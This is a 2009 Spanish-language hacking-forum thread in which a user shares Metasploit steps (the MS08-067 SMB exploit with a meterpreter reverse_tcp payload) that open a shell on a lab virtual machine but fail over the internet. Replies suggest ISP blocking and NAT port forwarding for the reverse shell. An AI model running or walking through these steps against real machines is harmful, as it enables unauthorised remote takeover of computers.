elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 11:35  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan  (Leído 2,415 veces)
firewall-27

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan
« en: 26 Agosto 2009, 01:23 »

Hola amigos.
Estoy intentando explotar una vulerabilidad en win que devuelve una shell remota.
Poseo una red interna (una maquina virtual para ser mas espesificos, configurada las dos maquinas en la misma red, funcionando y todo, respondiendo a los ping, nmap y demas.) Entre mis pc interas, al explotar la vulnerabilidad funciona bien, me devuelve la shell y demas, pero con una maquina de un amigo de internet CONFIGURADA EXACTAMENTE IGUAL (misma version de WinXp,etc), no puedo obtener la shell remota, me da error de que se explota la vulnerabilidad, todo bien, pero me dice de que no se pudo crear sesion.
Es problema de router o de alguna configuracion que le esta faltando a mi exploit?

Detalles:


Algo de la configuracion de mi router:
http://img17.imageshack.us/i/config1s.png/
http://img406.imageshack.us/i/config2.png/
http://img174.imageshack.us/i/config3.png/
http://img29.imageshack.us/i/config4.png/

Pasos que uso para explotar la vulnerabilidad:
#msfconsole
>use windows/smb/ms08_067_netapi
>set payload windows/meterpreter/reverse_tcp
>set rhost X.X.X.X     (obvio que es la ip de mi victica)
>set lhost X.X.X.X      (aca pongo la ip que me dice la pagina www.whatismyip .com para saber cual es la ip de mi router)
>exploit
estos mismos pasos funcionan a la perfeccion en mi maquina virtual pero cuando lo pruebo con alguna de internet,me tilda con exito de que explota la vulnerabilidad y cosas mas, pero cuando llega al paso de crear la sesion me dice que no se pudo crear sesion.

¿Alguna idea? Si falta algo mas de info diganme.
Desde ya muchas gracias
En línea
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan
« Respuesta #1 en: 26 Agosto 2009, 03:51 »

Posiblemente el ISP bloque algo.

Saludos
En línea

Bien Super Divertido
@wifigdlmx
qwertyhack

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan
« Respuesta #2 en: 26 Agosto 2009, 07:58 »

 creo que te falta la ip privada...
En línea
kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.203


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan
« Respuesta #3 en: 27 Agosto 2009, 13:36 »

tendrás que redireccionar en tu router el puerto por el que se te devuelve la shell a tu Pc mediante Nat
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
alexkof158


Desconectado Desconectado

Mensajes: 405


LOL


Ver Perfil
Re: Metasploit devuelve shell con maquinas en la misma Lan pero no con las de la Wan
« Respuesta #4 en: 27 Agosto 2009, 16:17 »

http://foro.elhacker.net/bugs_y_exploits/microsoft_windows_server_service_rpc_handling_remote_code_execution_vulnerability-t232525.0.html

 :D alli en ese tema debaten tu pregunta unas cuants personsas  :laugh:
En línea

"noproxy"
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines